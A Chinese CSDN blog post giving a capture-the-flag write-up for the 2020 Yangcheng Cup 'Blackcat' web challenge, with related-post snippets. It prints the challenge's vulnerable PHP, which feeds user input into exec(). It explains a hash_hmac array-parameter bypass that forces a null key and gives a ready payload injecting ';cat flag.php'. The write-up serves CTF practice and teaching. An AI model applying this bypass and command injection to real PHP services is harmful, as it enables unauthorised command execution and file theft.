每日练习-[羊城杯 2020]Blackcat

已于 2023-09-04 22:17:52 修改
阅读量166 收藏
点赞数
文章标签: 哈希算法 算法
于 2023-09-04 22:15:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/132678753
版权

下载mp3文件,010打开末尾有代码提示

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('x');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('x');
}

echo exec("nc".$_POST['One-ear']);
 hash_hmac函数

在第二个参数为数组之时,第三个参数key就为null。

本题大致从环境变量从取clandestine值为key,但是hash函数第二个参数可控,导致key可以为null

即clandestine值为null 

这样子第一个hash函数值就可控,同时也可以与第二个hash伪造值相等。

接着就考虑如何rce,exec函数可以命令执同时有echo,这样子就有了回显。

<?php
$hh = hash_hmac('sha256',';cat flag.php', null);
echo $hh;
#在线工具

 伪造的hash值

04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
payload:
 

Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1

He@11
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[羊城 2020]black cat - 文件隐写+RCE(hash_hmac绕过)
oZuoShen123的博客
10-10 510
这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor 这里有3个if,首先第一个肯定绕过; 第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空 第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行 特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
[羊城 2020]Blackcat
m0_70819573的博客
04-09 189
第一个hash_hmac的密钥是环境变量clandestine的值,如果data传入的值为数组,那么就会返回NULL。那么第二个hash_hmac的密钥就是NULL,返回的值就只跟data有关,就是我们可控的了。还用了echo,是有回显的,但是exec只返回命令执行结果的最后一行内容。最后的命令执行这里出不了网,使用;sha2和md5相似,弱相等能用数组绕过,可以本地执行hash_hmac函数,然后让。ls是多行显示,所以只能显示一行的内容。1.打开环境,在源码处有提示。2.进入.mp3发现源码。
NSSCTF第11页(3)
wwwwyyyrre的博客
11-09 636
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
Blackcat-WordPress资源付费主题
11-06
综上所述,Blackcat-WordPress资源付费主题是构建一个成功的付费内容平台的理想选择,它不仅提供了丰富的功能,而且在用户体验、安全性、可扩展性和SEO方面都表现出色。无论你是个人博主还是企业网站,都能借助这个...
Blackcat主题-Wordpress.rar
03-20
资源都是经过测试的,放心购买,如果资源有问题私信回复我会处理。
Blackcat Chrome Extension-crx插件
04-01
扩展到Blackcat的Chrome浏览器 - 从中​​国Web界面订购BlackCAT 帮助BlackCat.vn的客户订购Page Interface的订单来自中国的销售网站的产品详情:淘宝(或儿童)淘宝网站,tmall.com,1688.com。 支持页面列表也将...
blackcat:使用telegram bot查询黑猫物流
05-11
blackcat 使用telegram bot查询黑猫物流 Screenshot
BUUCTF--[羊城 2020]Blackcat
qq_46263951的博客
08-19 1062
进入后查看源码发现提示都说听听歌了! 下载Hei_Mao_Jing_Chang.mp3文件,使用命令strings Hei_Mao_Jing_Chang.mp3查看文件 在文末看到一段PHP代码 if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){ die(' $clandestine = getenv("clandestine"); if(isset($_POST['White-cat-monitor'..
[NSSCTF][羊城2020]WEB复现
cosmoslin的博客
03-13 5247
easycon 考点:一句话,base64转图片 访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接 里面有一个bbbbbbbbb.txt,打开发现是一串base64编码 发现是jpg头,base64转图片即可 easyphp 考点:.htaccess <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){
buu-day05
anwen12的博客
01-03 711
0x01 [NPUCTF2020]验证???? str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '') 第一步是一个弱类型比较,下面有两个常用的比较方式 a[]=a&b[]=a a='1' &b=[1] 注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。 第二步就是研究上面这个正则表达式了。一共分为3个
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
2020羊城、第六届工控比赛部分题目复现
m0re's blog
09-17 2413
本文目录羊城easyconBlackCat工控签到ICS_1ICS_4ICS_10ICS_12 羊城 easycon 环境打开 dirsearch扫描得到两个可以访问的文件 一个是index.html、另一个是index.php访问index.php会有个弹窗,看到 题目中提示菜刀。所以猜测这个是连接密码。 使用蚁剑连接,成功连接。 但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。 BlackCa
(leetcode学习)50. Pow(x, n)
最新发布
m0_54888411的博客
08-05 143
快速幂,第一次写的时候用 n%2==1,这样不能处理负数的问题。
Java练习题,创建一个猫类,然后分别创建三只猫的对象,分别是黑猫,白猫,黄猫,让三只猫都去捉老鼠
06-02
好的,我来为你解答这个Java练习题。 首先,我们需要创建一个猫类,并添加猫的颜色属性。代码如下: ```java public class Cat { private String color; public Cat(String color) { this.color = color; } ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值